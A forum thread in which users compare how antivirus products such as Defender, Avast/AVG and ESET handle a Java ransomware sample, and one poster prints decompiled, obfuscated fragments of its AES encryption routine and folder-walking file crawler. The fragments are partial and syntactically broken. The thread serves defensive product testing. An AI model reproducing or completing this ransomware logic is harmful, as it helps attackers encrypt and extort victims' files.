KonradPL
Level 4
- May 1, 2018
- 169
Please test McafeeIf someone can send me the sample, I can test both Defender and Avast/AVG.

Please test McafeeIf someone can send me the sample, I can test both Defender and Avast/AVG.
It was on and protecting all folders that go there by default:@marcopaone @McMcbrad Thank you both for testing Defender
The ransomware protection of AVG/Avast prevented the encryption of documents/pictures, could Controlled Folder Access of Defender do the same?
Thanks, it's disappointing that CFA didn't make any difference.It was on and protecting all folders that go there by default:
View attachment 250507
Nothing too unusual.If this is bypassing CFA it must be using some sort of special technique to encrypt. CFA is very protective and doesn’t have much of a whitelist, it also causes a lot of false positives.
That’s probably part of why DeepGuard was defeated.
It might be worth trying some of the other strong behavior blockers like Kaspersky or Emsisoft.
What about eset? Maybe Eset can do better?Nothing too unusual.
Encryption algorithm:
File crawler and main algorithmimport java.nio.file.Path;
import java.nio.file.SimpleFileVisitor;
import java.security.Key;
import java.security.NoSuchAlgorithmException;
import javax.crypto.Cipher;
import javax.crypto.KeyGenerator;
import javax.crypto.NoSuchPaddingException;
public /* synthetic */ encryptAes() throws NoSuchAlgorithmException, NoSuchPaddingException {
encryptAes encryptAes2;
encryptAes2.keyGenerator = KeyGenerator.getInstance(Main$Open. ((Object) [1], (int)-970469275));
encryptAes2.encrypter = Cipher.getInstance(Main$Open. ((Object) [2], (int)-704451753));
encryptAes2.keyGenerator.init(128);
encryptAes2.key = encryptAes2.keyGenerator.generateKey();
These are built-in Java 6 libraries and not even loaded from GitHub.import java.util.HashMap;
encryptAes encryptAes2 = new encryptAes();
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [0], (int)-601438172)) + Main$Open. ((Object) [1], (int)-1877012877), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [2], (int)1693082425)) + Main$Open. ((Object) [3], (int)54234075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [4], (int)-557160074)) + Main$Open. ((Object) [5], (int)-135269237), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [6], (int)-504606357)) + Main$Open. ((Object) [7], (int)72707544), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [8], (int)713534176)) + Main$Open. ((Object) [9], (int)-969383075), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
Files.walkFileTree(Paths.get(System.getProperty(Main$Open. ((Object) [10], (int)1242977540)) + Main$Open. ((Object) [11], (int)906653621), new String[0]), (FileVisitor<? super Path>)((Object)encryptAes2));
}
What about eset? Maybe Eset can do better?
Upon execution:
WiseVector StopX is such a beast, it is everything that Cylance promises to be but doesnt.
They say things like this every year...in newspapers every year will be the coldest from 30 years onwards, threats will evade all AVs and more...In newspapers they say that 2021 there will be a new wave : Ransomware 2.0
So be careful and stay protected !